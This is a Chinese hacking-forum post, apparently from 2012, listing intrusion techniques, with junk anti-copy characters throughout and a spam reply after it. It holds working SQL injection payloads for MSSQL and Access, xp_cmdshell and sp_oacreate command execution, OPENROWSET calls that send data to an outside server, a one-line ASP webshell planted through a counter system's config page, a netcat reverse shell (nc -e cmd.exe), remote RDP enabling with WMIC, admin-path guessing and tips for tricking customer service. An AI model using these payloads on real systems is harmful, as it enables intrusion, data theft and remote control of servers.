找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3219|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
SA点数据库分离技术相关
  w9 u' ^6 n! x+ ~( Y1 N1 f& ~/ `: ~( d
0 j( |/ w6 a, v* U, X2 ?. I- @
SA点数据库分离搞法+语句:
& @5 O5 n. s; Z$ l( Y" n3 P+ h) w2 V% C/ Q9 {1 l4 h5 T3 P0 f
注射点不显错,执行下面三条语句页面都返回正常。& U5 V+ S, x& B( @
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
8 d1 G. L5 m4 U/ U" land 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')5 F# N, ?( {3 D3 C! X" s% n, ~" ?
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
: M2 D5 H; r( Y+ n5 i, N. M可以列目录,判断系统为2000,web与数据库分离
% O1 ~- J' R2 r  A遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。, @- y, P& y7 k. u3 X
在注射点上执行$ F7 ?+ Q) F+ Q+ Q% V
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--: w8 G0 F) ~4 e. H7 t3 D$ F5 N5 E
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
* }9 z* Q8 t, g. O: m0 i还有我用NC监听得其他端口都没有得到IP。+ ]4 a; d( A# y( M, }

6 r7 F2 N) ^8 j+ u/ n  W通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
# \- D- x& O9 C( X: ^# I6 c'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--$ w) R) f; e5 c8 l7 R
7 j# I- ]. e. ~2 M
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
- X9 T1 l6 W7 M  R. {9 v. P" o' ^* F% ^1 X
现在就猜想是不是数据库是内网而且不能连外网。( O* {! w& k% T1 H& u

+ Q+ ]- _" Q6 r5 s6 j8 ^
$ e6 R  Z' m: `access导出txt文本代码
/ g# J, x% Z! _& f* s6 aSELECT * into [test.txt] in 'd:\web\' 'text;' from admin
, _8 r+ g' {) l; @# L+ S1 q( B4 [0 e9 Y8 H5 @
! r% y0 k3 S4 H

  w( `1 b7 \) b+ o$ r4 {4 x, W7 ~' {自动跳转到指定网站代码头8 |- E/ o2 ?: P; s0 Q( v% t
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
# L8 A* v, U2 F& k, Z4 T
9 x7 c6 W% L% O' A* o2 |3 B  K  b0 M! d9 A8 Z( ]! S
入侵java or jsp站点时默认配置文件路径:2 Z, ~8 D3 k4 `  r- H
\web-inf\web.xml: W! Z9 O6 E9 v( S/ [
tomcat下的配置文件位置:
% K( f- K3 J6 {7 w9 ^\conf\server.xml            (前面加上tomcat路径)/ ~, q; D; [9 _# f* c* O6 l
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml; c% U5 u1 @' l: g8 _: \2 ]  I
: R1 V/ h1 l1 a4 M
9 \, U" f. x# \1 }5 r0 p2 x" q" A5 E1 q
5 B- P5 l% X: N/ g7 ?
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:# U! ]& m" f$ w; y# `
-1%233 `7 L2 g- ]0 ]
> / o  U: T4 ~. k( f+ X8 c
<
  f+ c3 @9 z. \& Y2 K  C- |1'+or+'1'='1# v4 u1 ^6 |2 G
id=8%bf9 c' p7 ~; I4 r. v  h( }- X$ I( a

5 X) P& a" y* Q- x" o全新注入点检测试法:. P# O# F  Q6 g8 p9 }% ]- z
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
% ?$ ]8 u* Y, O# c
' }5 E4 O9 d) h3 I# U在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。3 }: R5 N5 y7 E0 W  k  Z2 N

( ?2 y6 @3 O4 {" [5 w: V搜索型注入判断方法:$ w  n* C  M- b
北京%' and '1'='1' and '%'='5 [8 W& j4 D7 e8 I. \* d3 v. D
北京%' and '1'='2' and '%'='
+ W3 T# F( _# w1 x5 O8 c, o
* B) j/ y' s1 }  Y$ L: f8 u
# J7 C  b; t8 q, y5 dCOOKIES注入:
" H, u: |8 m7 s( L, b6 t3 k0 a1 [& v1 L0 v2 M! \
javascript:alert(document.cookie="id="+escape("51 and 1=1"));
: f0 q' o5 J+ X6 }! }
2 R' D" h8 h6 N8 l& l2000专业版查看本地登录用户命令:
/ X* b% w5 h8 s. H7 o& Dnet config workstation1 l8 e3 T3 n$ j* ^  q! S* p. w

  Y) R( ]6 b4 _+ R1 I% C. }$ v- w
; `. R7 ^2 A. V2003下查看ipsec配置和默认防火墙配置命令:/ a9 a* B- w8 F$ V
netsh firewall show config
7 u3 m+ W; A& q; N1 e# \" c* qnetsh ipsec static show all
4 j$ E2 b# w) ~# ]4 B+ A" ]- ~6 V) A9 w: X2 t
不指派指定策略命令:/ m" r% p, v7 a3 G( K9 F
netsh ipsec static set policy name=test assign=n  (test是不指派的策略名)* i+ u3 H( h0 r) w- Q+ |  u
netsh ipsec static show policy all  显示策略名
* n3 k2 G9 P9 k+ v6 U5 [4 ^: w8 U

1 ^! m' w8 l0 y猜管理员后台小技巧:3 c- }! ^' P7 F! Z
admin/left.asp : x' l& X0 ~0 M& F$ f/ i( S
admin/main.asp5 B/ B# V0 Z4 h2 G- x) O
admin/top.asp6 N1 Z- r  y0 W2 D4 K
admin/admin.asp
' {, u2 j% x. d4 v/ T; j; d; p. Y会现出菜单导航,然后迅雷下载全部链接9 C6 x' o! Z, Y3 Q

3 f+ |" F  i6 \3 S6 s/ m$ W2 F  l1 d; N. C7 v0 y# X9 ~! W. }1 r
社会工程学:
. f$ A3 M- Y! M用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
+ `: g$ A: i2 w/ c7 k然后去骗客服5 ?, \$ n7 c7 |$ z$ n2 s4 S
- j( k5 D( l# L! \0 U7 h5 ~$ b- x
; h' G* k  y$ g! ^/ m: Q9 B
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: 0 e6 u' u% {/ n# U( l7 _. E
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, & K1 A4 H2 H* K3 W! I. H
  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
5 r7 J0 o( [5 _8 e/ u8 Z) ^! q" |1 _9 c' ~1 e
3 G; D8 ~9 w+ H" D
% e" W: E* w. n) v  z# S  l( _3 x
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
3 M, U5 h: c% P4 X* O& x/ O3 F: ~$ e! o7 }+ \0 @. k

( ?# k% E( `, K% [! D& a( j% r+ x3 s+ G' B/ G2 N0 p$ M
CMD加密注册表位置
: A5 U1 Q$ q7 S! J(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor; H7 G+ k' f: q* u* p% G* s4 |( }4 p, _
AutoRun
* V1 P; V7 Z, O: {( q1 m6 V( R; a! L- j1 E2 c) T. Y
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor# A( [  G/ {3 V1 V
AutoRun
1 u/ M. D( ?, h# M. o8 R, c  f+ b) W. Q+ J6 J0 u

& S! e: N/ P% a; R在找注入时搜索Hidden,把他改成test
7 p; N: E$ n* p+ V' G- f: ~/ ?' m0 }9 `/ f& r1 v
+ n0 F0 o; t. c; ?" x8 I4 @

  S, S& j+ m- t" t% p! L8 V. jmstsc /v:IP /console
2 D! G6 l8 V) ?) Z# f0 r- H
. [) G, z1 q3 S7 }1 z4 d4 R6 e; T7 @4 z9 L) f+ K1 |
一句话开3389:  a/ N" t: P* R! Z9 T% G. i, c# C

8 _9 c3 x! s/ N. x最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  0 C) G5 q6 X1 f+ g7 R! W# Z
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.2 R( |/ g, f( J
; g) W3 K" Q. v+ V
: i/ {; X0 J: d. o& c- [
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
& \  n0 M% `4 rInsert into admin(user,pwd) values('test','test')
% y0 g4 O  B& X7 T4 E4 h) e/ w  |( p4 p! s) i

. Z/ x5 a0 J3 o' hNC反弹
" j# C! h$ n  U, O( {" z# L" @' ^先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   & A( a, C# b$ O6 X$ y
然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)1 u) m* o+ m- c7 C

1 q& I1 t: f- ~4 L) n) q8 ~- ?/ c) J: H2 t6 X
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题+ ?/ n  x; v  n; ]4 q

* Z; H& g, L" D) _- K1 d有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录& F- b  L( [. p, i- r  L0 I7 h
例如:' G! h- J2 k' I* y
subst k: d:\www\ 用d盘www目录替代k盘* P8 L- g0 ?. K3 n6 \9 s
subst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表